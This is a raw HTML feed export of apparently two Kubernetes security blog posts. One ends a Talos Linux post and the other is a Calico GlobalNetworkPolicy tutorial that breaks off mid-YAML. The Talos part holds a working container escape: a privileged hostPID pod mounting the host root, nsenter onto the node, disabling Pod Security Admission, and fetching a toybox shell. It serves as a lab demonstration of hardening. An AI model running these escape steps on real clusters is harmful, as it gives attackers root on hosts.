  <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">escape</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">hostPID:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nicolaka/netshoot:latest</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>, <span class="hljs-string">"3600"</span>]
      <span class="hljs-attr">securityContext:</span>
        <span class="hljs-attr">privileged:</span> <span class="hljs-literal">true</span>
      <span class="hljs-attr">volumeMounts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
          <span class="hljs-attr">mountPath:</span> <span class="hljs-string">/host</span>
  <span class="hljs-attr">volumes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
      <span class="hljs-attr">hostPath:</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
        <span class="hljs-attr">type:</span> <span class="hljs-string">Directory</span>
  <span class="hljs-attr">restartPolicy:</span> <span class="hljs-string">Never</span>
</code></pre>
<h3 id="heading-escaping-on-an-ubuntu-node">Escaping on an Ubuntu node</h3>
<p>Apply the pod on a cluster with regular Ubuntu nodes:</p>
<pre><code class="lang-bash">kubectl apply -f escape.yaml
</code></pre>
<p>Then exec in, escape, and play around:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Exec in</span>
matt@controlplane:~/container_escape$ kubectl <span class="hljs-built_in">exec</span> -it escape -- bash

<span class="hljs-comment"># Escape</span>
escape:~<span class="hljs-comment"># nsenter --target 1 --mount --uts --ipc --net --pid</span>

<span class="hljs-comment"># We are in</span>
<span class="hljs-comment"># uname</span>
Linux
<span class="hljs-comment"># whoami</span>
root
<span class="hljs-comment"># cat /etc/os-release</span>
PRETTY_NAME=<span class="hljs-string">"Ubuntu 24.04.3 LTS"</span>
NAME=<span class="hljs-string">"Ubuntu"</span>
VERSION_ID=<span class="hljs-string">"24.04"</span>
VERSION=<span class="hljs-string">"24.04.3 LTS (Noble Numbat)"</span>
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL=<span class="hljs-string">"https://www.ubuntu.com/"</span>
SUPPORT_URL=<span class="hljs-string">"https://help.ubuntu.com/"</span>
BUG_REPORT_URL=<span class="hljs-string">"https://bugs.launchpad.net/ubuntu/"</span>
PRIVACY_POLICY_URL=<span class="hljs-string">"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"</span>
UBUNTU_CODENAME=noble
LOGO=ubuntu-logo
</code></pre>
<p>Cool that is it. For kicks you could try some other stuff.</p>
<h3 id="heading-install-tooling">Install Tooling</h3>
<p><strong>Ubuntu host:</strong></p>
<pre><code class="lang-bash">apt update &amp;&amp; apt install -y nmap
</code></pre>
<p>Yes, tools. Try more.</p>
<h3 id="heading-escaping-on-a-talos-node">Escaping on a Talos node</h3>
<p>Try it out on your Talos node with our same escape pod. First thing you'll notice is it doesn't meet <a target="_blank" href="https://kubernetes.io/docs/concepts/security/pod-security-admission/">PSA standards</a>. </p>
<pre><code class="lang-bash">matt.brown@matt Talos % kubectl apply -f escape.yaml
Error from server (Forbidden): error when creating <span class="hljs-string">"escape.yaml"</span>: pods <span class="hljs-string">"escape"</span> is forbidden: violates PodSecurity <span class="hljs-string">"restricted:latest"</span>: host namespaces (hostPID=<span class="hljs-literal">true</span>), privileged (container <span class="hljs-string">"escape"</span> must not <span class="hljs-built_in">set</span> securityContext.privileged=<span class="hljs-literal">true</span>), allowPrivilegeEscalation != <span class="hljs-literal">false</span> (container <span class="hljs-string">"escape"</span> must <span class="hljs-built_in">set</span> securityContext.allowPrivilegeEscalation=<span class="hljs-literal">false</span>), unrestricted capabilities (container <span class="hljs-string">"escape"</span> must <span class="hljs-built_in">set</span> securityContext.capabilities.drop=[<span class="hljs-string">"ALL"</span>]), restricted volume types (volume <span class="hljs-string">"host-root"</span> uses restricted volume <span class="hljs-built_in">type</span> <span class="hljs-string">"hostPath"</span>), runAsNonRoot != <span class="hljs-literal">true</span> (pod or container <span class="hljs-string">"escape"</span> must <span class="hljs-built_in">set</span> securityContext.runAsNonRoot=<span class="hljs-literal">true</span>), seccompProfile (pod or container <span class="hljs-string">"escape"</span> must <span class="hljs-built_in">set</span> securityContext.seccompProfile.type to <span class="hljs-string">"RuntimeDefault"</span> or <span class="hljs-string">"Localhost"</span>)
</code></pre>
<p>Ok, that’s annoying for a test, so let’s disable it to allow the pod to be created. Just change the label as follows:</p>
<pre><code class="lang-bash">kubectl label ns default pod-security.kubernetes.io/enforce=privileged --overwrite
</code></pre>
<p>Now apply it again and wait for your pod to spin up. Then try to escape again.</p>
<pre><code class="lang-bash">matt.brown@matt Talos % kubectl <span class="hljs-built_in">exec</span> -it escape -- /bin/bash
escape:~<span class="hljs-comment"># nsenter --target 1 --mount --uts --ipc --net --pid</span>
nsenter: failed to execute /bin/sh: No such file or directory
escape:~<span class="hljs-comment">#</span>
</code></pre>
<p>Ok, this is annoying again, but not unexpected since the host doesn’t have the binary. Let's try a workaround. We'll use the <code>toybox</code> binary and leverage its shell capabilities:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Get the toybox binary</span>
escape:~<span class="hljs-comment"># curl -L -o toybox-aarch64 https://landley.net/toybox/downloads/binaries/latest/toybox-aarch64</span>
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  897k  100  897k    0     0  1162k      0 --:--:-- --:--:-- --:--:-- 1162k
escape:~<span class="hljs-comment"># chmod +x toybox-aarch64</span>

<span class="hljs-comment"># Escape using toybox binary</span>
escape:~<span class="hljs-comment"># nsenter --target 1 --mount --uts --ipc --net --pid -- \</span>
  /var/tmp/repro/toybox-aarch64 sh -i

<span class="hljs-comment"># Check the OS and try some stuff</span>
$ cat /etc/os-release
NAME=<span class="hljs-string">"Talos"</span>
ID=talos
VERSION_ID=v1.11.0
PRETTY_NAME=<span class="hljs-string">"Talos (v1.11.0)"</span>
HOME_URL=<span class="hljs-string">"https://www.talos.dev/"</span>
BUG_REPORT_URL=<span class="hljs-string">"https://github.com/siderolabs/talos/issues"</span>
VENDOR_NAME=<span class="hljs-string">"Sidero Labs"</span>
VENDOR_URL=<span class="hljs-string">"https://www.siderolabs.com/"</span>
$ apt install
sh: apt: No such file or directory
$ <span class="hljs-built_in">echo</span> <span class="hljs-string">"haxx"</span> &gt; /etc/talos-test
sh: /etc/talos-test: Read-only file system
</code></pre>
<p>Try other stuff and you'll see it is tightly locked down.</p>
<p>Escaping a container onto a typical Linux host is obviously not a good thing. Attackers get a full OS to play with, as we saw with the Ubuntu instance. Escaping onto Talos leaves them with… nothing useful. No packages, no persistence, etc. The blast radius is dramatically smaller. And we don't have game over for the whole cluster.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>I hoped this helped with getting a better understanding of Talos Linux. Talos strips away the usual chaos of a Linux host and leaves you with something closer to an appliance than an OS. On a regular Ubuntu node, escaping a container means you inherit a full operating system: shells, package managers, writable configs, and endless persistence tricks. On Talos, the same move drops you into a read-only world with no apt, no /etc changes, and no way to make anything stick past a reboot.</p>
<p>That difference is the point. Talos trades flexibility for predictability. You don’t get the comfort of tinkering when things break, but you also don’t get the mess of drift or attackers turning a one-off compromise into a permanent foothold. Instead, every node is defined by YAML, accessed by an API, and reset to its declared state at boot.</p>
<p>It’s not a platform for hobbyist debugging, but it is a strong foundation for the real world where consistency and security matter more than convenience. Talos makes Kubernetes boring, and that's not such a bad thing. </p>
<p>It you're exploring the immutable space, Talos is absolutely worth the time. It delivers on the promise of a minimal, locked-down base that is purpose-built for Kubernetes, rather than retrofitted from a general-purpose distro. If your goal is to cut drift, reduce your attack surface, and manage clusters as code (isn't that everyone's goal?), Talos fits neatly into that toolkit. There is of course a lot more to Talos, so definitely check it out.</p>
]]></content:encoded></item><item><title><![CDATA[Service Boundaries: Scaling with Calico]]></title><description><![CDATA[In Part 1 we took Kubernetes from “wide open by default” to a clean three-hop app chain. With a handful of NetworkPolicy manifests we locked the cluster down to just the flows the app actually needs: frontend → backend → database, plus DNS. Everythin...]]></description><link>https://cloudsecburrito.com/service-boundaries-scaling-with-calico</link><guid isPermaLink="true">https://cloudsecburrito.com/service-boundaries-scaling-with-calico</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[networkpolicy]]></category><category><![CDATA[calico]]></category><category><![CDATA[Calico Networking]]></category><category><![CDATA[Security]]></category><category><![CDATA[cloudsecurity]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 03 Sep 2025 22:43:59 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1756937946437/eb260b35-b792-43e0-83e6-7c93c11392f9.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics">Part 1</a> we took Kubernetes from “wide open by default” to a clean three-hop app chain. With a handful of <code>NetworkPolicy</code> manifests we locked the cluster down to just the flows the app actually needs: frontend → backend → database, plus DNS. Everything else? Nuke it.</p>
<p>That’s definitely a good start. But here’s the catch (always with the <em>catch</em>): what happens when you’re running <strong>a host of namespaces and services</strong>? Copy-pasting the same default-deny and DNS carve-outs everywhere doesn’t scale. Neither does sprinkling external CIDRs into random policies every time something needs to call an outside system.</p>
<p>This is where <strong>Calico</strong> steps in. It takes the same <code>NetworkPolicy</code> model you already know (and now love) and adds the missing pieces for real-world operations:</p>
<ul>
<li><p><strong>Global guardrails</strong> so you can enforce a cluster-wide baseline once.</p>
</li>
<li><p><strong>Flow logs</strong> so you can actually see what’s being allowed and denied.</p>
</li>
</ul>
<p>In other words, Calico isn’t a replacement for <code>NetworkPolicy</code> — it’s the natural next layer. It lets you move from blog-sized policies to <strong>real boundaries</strong> without drowning in YAML.</p>
<hr />
<h2 id="heading-what-the-hell-is-calico">What the Hell Is Calico?</h2>
<p>If you’ve been around Kubernetes for five minutes, you’ve probably seen the name <strong>Calico</strong>. For me, it started as the dead-simple CNI for my local kubeadm clusters: just wire up pod networking and get on with life. But as I dug deeper into NetworkPolicy, I noticed Calico showing up again. This time not just as plumbing, but as an add-on for security and visibility. So… what's the real deal?</p>
<p>At its core, <strong>Calico is both a networking layer and a security layer for Kubernetes</strong>. But it is really a full platform that can still act as your CNI, but also enforce policies, define global defaults, manage external networks, and generate flow logs for visibility. In other words, everything you learned with <code>NetworkPolicy</code> in Part 1 still applies, but Calico adds the missing pieces to make those guardrails scale across real clusters.</p>
<p>Today, Calico can:</p>
<ul>
<li><p>Enforce <strong>Kubernetes</strong> <code>NetworkPolicy</code> natively, just like the baseline rules we used in Part 1.</p>
</li>
<li><p>Extend those policies with <strong>Calico-only features</strong> like <code>GlobalNetworkPolicy</code>.</p>
</li>
<li><p>Provide <strong>flow logs and observability</strong>, so you can see what’s being allowed or denied.</p>
</li>
</ul>
<p>The important thing to know: you don’t need to swap out Kubernetes concepts to use Calico. It still understands <code>NetworkPolicy</code>. It just adds the missing pieces that make policies usable at scale.</p>
<hr />
<h2 id="heading-global-guardrails">Global Guardrails</h2>
<p>In Part 1 we locked down a simple three-tier app (frontend → backend → database) using Kubernetes <code>NetworkPolicy</code>. That worked well for a demo, but it quickly gets annoying when you move beyond a single app. Each namespace needs its own copy of the same baseline: default-deny, DNS egress, and the handful of allowed flows. Good luck keeping that up.</p>
<p>This is where Calico’s <strong>GlobalNetworkPolicy</strong> comes in. Unlike standard <code>NetworkPolicy</code>, which only applies inside a single namespace, a <code>GlobalNetworkPolicy</code> is enforced cluster-wide. That means you can set a universal default-deny once, or a universal DNS allow, and not worry about duplicating YAML everywhere. Sounds useful.</p>
<p>Here’s a simple example: a cluster-wide default-deny for all ingress and egress. Similar to our NetworkPolicy, but now it's global. We do carve out exceptions for the important namespaces. Save it as global_networkpolicy_deny.yaml.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">00</span><span class="hljs-string">-default-deny</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">"kubernetes.io/metadata.name not in {'kube-system','calico-system','calico-apiserver','tigera-operator'}"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>, <span class="hljs-string">Egress</span>]
  <span class="hljs-attr">ingress:</span> []
  <span class="hljs-attr">egress:</span> []
</code></pre>
<p>With that in place, <em>every</em> workload in the cluster is locked down by default. Let's give it a try.</p>
<blockquote>
<p>Lab only or chaos will ensue. And even in the lab chaos can ensue without the namespaceSelector. An hour wasted, trust me.</p>
</blockquote>
<p>Start by applying the policy:</p>
<pre><code class="lang-bash">matt@controlplane:~/calico$ kubectl apply -f global_networkpolicy_deny.yaml
globalnetworkpolicy.projectcalico.org/default-deny created
</code></pre>
<p>Next, let's run the same test as we did in <a target="_blank" href="https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics#heading-from-frontend-shell">Part 1</a>.</p>
<pre><code class="lang-bash">matt@controlplane:~/calico$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80
curl: (6) Could not resolve host: api.backend.svc.cluster.local</span>
</code></pre>
<p>It just works.</p>
<p>You'll notice we’re no longer using <code>networking.k8s.io/v1/NetworkPolicy</code> and are now taking advantage of the cool stuff Calico provides. Calico introduces its own <strong>Custom Resource Definitions (CRDs)</strong> for extended policy objects. Of course, that's why the YAML here says <code>apiVersion: projectcalico.org/v3</code>. So what does our CRD look like?</p>
<p>Do a quick check at the top of our CRD:</p>
<pre><code class="lang-bash">kubectl get crd globalnetworkpolicies.crd.projectcalico.org -o yaml | head -15
</code></pre>
<p>And sure enough, our loyal feline has installed a CRD just for this:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apiextensions.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CustomResourceDefinition</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">globalnetworkpolicies.crd.projectcalico.org</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">group:</span> <span class="hljs-string">projectcalico.org</span>
  <span class="hljs-attr">names:</span>
    <span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
    <span class="hljs-attr">plural:</span> <span class="hljs-string">globalnetworkpolicies</span>
    <span class="hljs-attr">singular:</span> <span class="hljs-string">globalnetworkpolicy</span>
  <span class="hljs-attr">scope:</span> <span class="hljs-string">Cluster</span>
  <span class="hljs-attr">versions:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">v3</span>
    <span class="hljs-attr">served:</span> <span class="hljs-literal">true</span>
    <span class="hljs-attr">storage:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>That <code>names.kind: GlobalNetworkPolicy</code> is the important part: it defines a new top-level resource that extends Kubernetes network policy to the entire cluster. This CRD is what makes the <code>apiVersion: projectcalico.org/v3</code> YAML valid, and it connects directly into the same enforcement pipeline you saw with native <code>NetworkPolicy</code>. The difference is scope! Instead of being limited to a single namespace, <code>GlobalNetworkPolicy</code> applies consistently across every namespace in the cluster.</p>
<p>So where do we need to go?</p>
<hr />
<h3 id="heading-dns-under-global-default-deny-calico">DNS Under Global Default-Deny (Calico)</h3>
<p>As soon as you flip on a <strong>global default-deny</strong>, the first thing that quietly dies is DNS. Service lookups stop working, external names can’t resolve, and suddenly every other test fails for mysterious reasons. Yes, I'm repeating Part 1.</p>
<p>That’s because DNS is just another flow — but it’s one that <em>every pod in the cluster</em> depends on. So before we can even think about app-to-app traffic, we need to carve DNS back out at the global level.</p>
<p>Two things must happen for lookups to work end-to-end:</p>
<ol>
<li><p><strong>Workloads must be allowed to query CoreDNS</strong> (egress 53/UDP+TCP).</p>
</li>
<li><p><strong>CoreDNS itself must be allowed to talk out</strong> — to the <strong>kube-apiserver</strong> (TCP/443) for watching Services/Endpoints, and to any <strong>upstream DNS resolvers</strong> it forwards to (53/UDP+TCP).</p>
</li>
</ol>
<h3 id="heading-primer-on-order">Primer on <code>order</code></h3>
<p>Once you move to Calico, policies aren’t just namespace-scoped lists, they’re evaluated by <strong>order</strong>.</p>
<ul>
<li><p><strong>Lower numbers = higher priority</strong>.</p>
</li>
<li><p>The first policy that matches and has a decisive action wins.</p>
</li>
<li><p>The global default-deny can omit <code>order</code> and be last.</p>
</li>
<li><p>DNS carve-outs need to sit at a slightly higher order (e.g. <code>20</code> and <code>21</code>) so they apply before the deny.</p>
</li>
</ul>
<p>Think of it like firewall rules: you want your DNS “allow” rules above the blanket “deny everything” rule.</p>
<h3 id="heading-the-yaml">The YAML</h3>
<p>Below is a single file that sets up two global policies: one for client pods to reach CoreDNS, and another for CoreDNS itself to reach the API server and upstream resolvers.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">01</span><span class="hljs-string">-dns-clients-egress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">20</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">"all()"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">'(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">'(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">02</span><span class="hljs-string">-dns-core</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">21</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">'(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>, <span class="hljs-string">Egress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">"all()"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">"all()"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-comment"># kube-apiserver Service IP (replace if different; often 10.96.0.1)</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">nets:</span> [<span class="hljs-string">"10.96.0.1/32"</span>]
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">443</span>]
    <span class="hljs-comment"># Upstream DNS resolvers (replace with your real upstreams)</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">nets:</span> [<span class="hljs-string">"8.8.8.8/32"</span>,<span class="hljs-string">"8.8.4.4/32"</span>]
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">nets:</span> [<span class="hljs-string">"8.8.8.8/32"</span>,<span class="hljs-string">"8.8.4.4/32"</span>]
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
</code></pre>
<h3 id="heading-what-this-does">What this does</h3>
<ul>
<li><p><strong>Clients → CoreDNS</strong>: any pod can send DNS queries to the DNS pods on UDP/TCP 53.</p>
</li>
<li><p><strong>Ingress into CoreDNS</strong>: opens 53 on DNS pods so queries aren’t dropped when ingress is enforced.</p>
</li>
<li><p><strong>CoreDNS → API server</strong>: lets CoreDNS watch Service/Endpoint changes on TCP/443 (required for cluster-local names).</p>
</li>
<li><p><strong>CoreDNS → upstream resolvers</strong>: if CoreDNS forwards externals, allow 53/UDP+TCP to those IPs (demo uses Google DNS; swap for your own).</p>
</li>
</ul>
<h3 id="heading-tips">Tips</h3>
<ul>
<li><p><strong>Find the API server ClusterIP</strong>:</p>
<pre><code class="lang-bash">  kubectl get svc kubernetes -n default -o jsonpath=<span class="hljs-string">'{.spec.clusterIP}'</span>
</code></pre>
</li>
<li><p><strong>Match CoreDNS labels on any distro</strong>:<br />  <code>'(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'</code></p>
</li>
<li><p><strong>Test quickly</strong>:</p>
<pre><code class="lang-bash">  kubectl run -n backend <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
  dig +short kubernetes.default.svc.cluster.local
  dig +short google.com
</code></pre>
</li>
</ul>
<h3 id="heading-straight-to-business">Straight to Business</h3>
<p>With this in place, DNS is restored across the cluster while the global default-deny remains active. Instead of sprinkling DNS exceptions into every namespace, you do it once globally — less YAML, fewer mistakes.</p>
<p>So now we’re at:</p>
<ul>
<li><p><strong>Global default-deny</strong>: in place and enforced.</p>
</li>
<li><p><strong>Global DNS allow</strong>: carved out so names resolve cluster-wide.</p>
</li>
</ul>
<p>That’s the baseline. Next up: app traffic.</p>
<hr />
<h2 id="heading-app-flows-under-global-deny">App Flows Under Global Deny</h2>
<p>Recall from <a target="_blank" href="https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics#heading-allow-service-to-service-flows">Part 1</a>, our clean three‑tier app chain: frontend → backend → database. Those namespace‑scoped <code>NetworkPolicy</code> objects worked great on their own.</p>
<p>But once you enable a <strong>Global Default‑Deny</strong>, those app flows no longer work. The global policy applies everywhere, so even the frontend can’t reach the backend unless you explicitly make space for it.</p>
<p>So what do you do? You’ve got at least two main paths forward.</p>
<h3 id="heading-option-a-keep-kubernetes-networkpolicy-working">Option A — Keep Kubernetes <code>NetworkPolicy</code> Working</h3>
<p>The simplest way is to exclude your app namespaces from the global deny. That way, <code>frontend</code>, <code>backend</code>, and <code>db</code> continue to be governed by the native policies you wrote in Part 1. Everywhere else in the cluster stays locked down.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">00</span><span class="hljs-string">-default-deny</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">"kubernetes.io/metadata.name not in {'kube-system','calico-system','calico-apiserver','tigera-operator','frontend','backend','db'}"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>, <span class="hljs-string">Egress</span>]
  <span class="hljs-attr">ingress:</span> []
  <span class="hljs-attr">egress:</span> []
</code></pre>
<p>I would assess this as not even that good for quick labs and definitely not for scale.</p>
<h3 id="heading-option-b-calico-globals-with-explicit-ingress-and-egress">Option B — Calico Globals (with explicit ingress <strong>and</strong> egress)</h3>
<p>Re-express the app flows as <strong>Calico GlobalNetworkPolicies</strong> with <code>order</code> so they evaluate <strong>before</strong> the global deny. You must allow <strong>both directions</strong>: permit <strong>ingress</strong> on the destination tier and <strong>egress</strong> from the source tier. This is not too different from our previous network policies.</p>
<h4 id="heading-frontend-backend-http-80">Frontend → Backend (HTTP :80)</h4>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">09</span><span class="hljs-string">-frontend-egress-to-backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">9</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">projectcalico.org/namespace</span> <span class="hljs-string">==</span> <span class="hljs-string">"frontend"</span>  
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>                      
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">80</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">09</span><span class="hljs-string">-backend-ingress-from-frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">9</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>                              
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">projectcalico.org/name</span> <span class="hljs-string">==</span> <span class="hljs-string">"frontend"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">80</span>]
</code></pre>
<h4 id="heading-backend-database-tcp-5432">Backend → Database (TCP :5432)</h4>
<pre><code class="lang-yaml"><span class="hljs-comment"># Database INGRESS from Backend</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">09</span><span class="hljs-string">-allow-backend-to-db-ingress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">9</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"db"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>   <span class="hljs-comment"># backend pods</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">5432</span>]
<span class="hljs-meta">---</span>
<span class="hljs-comment"># Backend EGRESS to Database</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
